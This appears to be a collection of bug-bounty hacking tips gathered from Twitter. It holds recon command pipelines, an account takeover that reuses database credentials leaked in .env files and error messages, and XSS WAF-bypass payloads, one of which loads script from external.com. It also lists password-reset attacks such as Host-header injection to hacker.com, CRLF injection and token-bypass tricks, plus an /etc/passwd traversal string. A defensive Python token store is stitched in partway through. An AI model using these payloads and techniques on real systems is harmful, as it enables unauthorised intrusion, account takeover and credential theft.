Below are tips from Twitter handles


Web archive > internet.domain.com > dirsearch > found a .git/index file; used gin to read the index file

pip3 install gin
gin <index file>
found .env file

opened it > full of credentials giving access to their MySQL database

connect using:

mysql -u username -p -h <ip/host> 
password: <password>


amass enum -d target.com -passive -o s3subs.txt
s3scanner s3subs.txt

You might find hidden, misconfigured S3 buckets; if you have write permissions, you can take over the bucket and report it as High/P2.

Twitter - phpMyAdmin Account Takeover

1. Found a WordPress website with a search parameter

2. Got an easy XSS on the same parameter

3. While trying to get more impact from the XSS, the application crashed unexpectedly.

4. The error message revealed the “Database Connection String”, exposing the DB name, username, password, etc.

5. Did some more research; directory brute force found a “phpmyadmin” directory at /c/soft/phpmyadmin.

6. Used the credentials revealed in the connection string and logged in successfully.


  • If you get XSS on WordPress, try some other random payloads.

  • The application's logic may break and reveal internal information.

  • Recon, recon and recon to find a use for the information.


A “Jenkinsfile” can give you passwords from a Jenkins instance. Add it to your wordlist.



Firefox is the only browser which allows self-closing script tags.


XXE via injected metadata in image bytes → blind SSRF via a local DTD → grabbed AWS EC2 credentials blindly → pwned


Bypass F5 BIG-IP WAF with an XSS payload

Interesting: %5K is converted to the “P” character


"><P/onwheel=alert(1)>mouse wheel here<!-- Injected Payload %22%3e%3c%5K/onwheel=alert(1)%3emouse%20wheel%20here%3c%21--


Easy Automation XSS Tip

cat subdomain.txt | waybackurls >> wayback.txt
cat subdomain.txt | hakrawler -depth 3 -plain >> spider.txt
cat spider.txt wayback.txt | kxss
Hakrawler by @hakluke
Waybackurls, kxss by @TomNomNom
Recommended: dalfox instead of kxss
cat spider.txt | grep "=" | dalfox pipe
dalfox by @hahwul


Use ffuf for vhost fuzzing on every new domain to find hidden servers/admin panels:

ffuf -c -u https://target.com -H "Host: FUZZ" -w vhost_wordlist.txt

Pro-tip: do both "Host: FUZZ" and "Host: FUZZ.target.com"


Fuzzing list to FIND SSRF

<=== PHP cve2020


Just found and triaged an HTTP auth bypass on a private program. Change the method from GET to POST:

GET /oauth2login got HTTP auth
POST /oauth2login/index/ bypassed it to an internal panel


Testing password reset functionalities:

1) Include your mail as a second parameter (you might receive the reset link):

POST /reset 

2) Brute force the reset token if it is numeric. You can use IP Rotator in Burp Suite to bypass the rate limit in case it's IP based:

POST /reset 

3) Try to use your reset token on the target's account:

POST /reset 

4) Host header injection: change website.com to hacker.com (the victim might receive the reset link with your host instead of the original website's)

POST /reset 
Host: hacker.com 

5) Try to figure out how the tokens are generated. Examples can be:

- Generated based on a timestamp

- Generated based on the ID of the user

- Generated based on the email of the user


1- Completely remove the token

2- change it to 000000000000

3- use null/nil value

4- try expired token

5- try an array of old tokens

6- look for race conditions

7- change 1 char at the beginning/end to see if the token is actually evaluated

8- use Unicode character jutsu to spoof the email address

9- try victim@email.com&attacker@email.com; use %20 or | as separators

10- try to register the same mail with a different TLD (.eu, .net, etc.)

11- don't add the domain locu@

12- try SQLi bypass and wildcards: or, %, *

13- request smuggling

14- change the request method (GET, PUT, POST, etc.) and/or content type (XML <> JSON)

15- match a bad response and replace it with a good one

16- use a super long string


with CRLF: /resetPassword?0a%0dHost:attacker.tld (x-host, true-client-ip, x-forwarded...)

@11xuxx credit to @joohoi
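As a defender-side counterpart to the token checks listed above (removed, null or array-valued tokens, all-zero values, expired tokens, reuse on another account, single-character changes, race conditions), here is a constructed Python example, not from any of the quoted tweets, of a reset-token store that rejects each of those cases. The 15-minute lifetime and the in-memory dict are assumptions for illustration.

```python
import hashlib
import secrets
import threading
import time
from typing import Dict, Optional, Tuple

TOKEN_TTL_SECONDS = 15 * 60  # assumed policy: short-lived tokens


def _digest(token: str) -> str:
    # Store only a hash so a leaked table does not hand out usable tokens.
    return hashlib.sha256(token.encode("utf-8")).hexdigest()


class ResetTokenStore:
    """Issue and verify single-use password-reset tokens (constructed example)."""

    def __init__(self) -> None:
        # digest -> (owning user id, expiry timestamp); in-memory for the demo
        self._pending: Dict[str, Tuple[str, float]] = {}
        self._lock = threading.Lock()

    def issue(self, user_id: str, now: Optional[float] = None) -> str:
        now = time.time() if now is None else now
        # 256 bits from the OS CSPRNG: not derived from a timestamp, user id or
        # email, so it cannot be predicted or brute-forced like a numeric code.
        token = secrets.token_urlsafe(32)
        with self._lock:
            self._pending[_digest(token)] = (user_id, now + TOKEN_TTL_SECONDS)
        return token

    def verify(self, user_id: str, token: object, now: Optional[float] = None) -> bool:
        now = time.time() if now is None else now
        # Missing, null, empty or array-valued "tokens" never match anything.
        if not isinstance(token, str) or not token:
            return False
        key = _digest(token)
        # Check-and-consume under one lock, so two concurrent requests with the
        # same token cannot both succeed (closes the race-condition window).
        with self._lock:
            entry = self._pending.get(key)
            if entry is None:
                return False  # unknown, already used, or one character altered
            owner, expires_at = entry
            if owner != user_id or now > expires_at:
                return False  # bound to the requesting account; expired stays dead
            del self._pending[key]  # single use
        return True
```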

Using ffuf the right way and gaining admin access

1. "ffuf -u ... -mc all" -> match all response codes

2. ctrl+c after 5 sec

3. "ffuf -u ... -mc all -fw ..."

4. found a backdoor the developer used to log in as admin (response code 404)


Filter bypass

<style/><img src="z'z</style><script/z>alert(1)</script>">
<script/z> can load external JS:
<script/z src=//external.com/1.js>


Bootstrap payload bypassing WAF filters

<Brute Data-Spy=scroll Data-Target='<Svg OnLoad=(confirm) (1)>'>


Got an SSRF inside a company ASN?

No cloud metadata endpoint to hit?

Don't forget to scan for internal hosts and try sqlmap

sqlmap via SSRF!


Arbitrary file read

![a](/uploads/1111111111111111111111111111111111111111111111111/ ../ ../ ../ ../ ../ ../ ../ ../ ../ ../ ../ ../ ../ ../ ../ ../ ../etc/passwd)
